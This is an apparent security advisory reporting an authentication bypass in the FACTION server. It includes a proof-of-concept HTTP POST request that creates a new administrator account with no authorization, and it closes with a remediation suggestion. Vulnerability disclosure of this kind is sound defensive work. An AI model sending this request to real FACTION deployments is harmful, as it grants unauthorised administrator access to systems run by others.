Closed
Description
Summary
An authentication bypass vulnerability allows an attacker to access the FACTION server with admin privileges.
Details
Authentication is bypassed when an attacker registers a new user with admin privileges. This is possible at any time without any authorization. The request must follow the validation rules (no missing information, secure password, etc) but there are no other controls stopping them.
PoC
- Setup FACTION locally using the
docker-composescript. - Complete the initial setup screen to create an admin user.
- Send the following request replacing
localhostand8080as needed (note that no authorization information is included)POST / HTTP/1.1 Host: localhost:8080 Content-Length: 148 Cache-Control: max-age=0 Origin: http://localhost:8080 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 adminUsername=testadmin2&adminPassword=Testadmin2&confirm=Testadmin2&first=test&last=admin2&[email protected]&team=admins&action=create - Log in with the new
testadmin2user - Observe login was successful with a new user possessing administrator privileges
Remediation
The "Create User" endpoint should be disabled after the first user is created. This would require new users to be created by an existing administrator, if using native authentication.
Metadata
Metadata
Assignees
Labels
No labels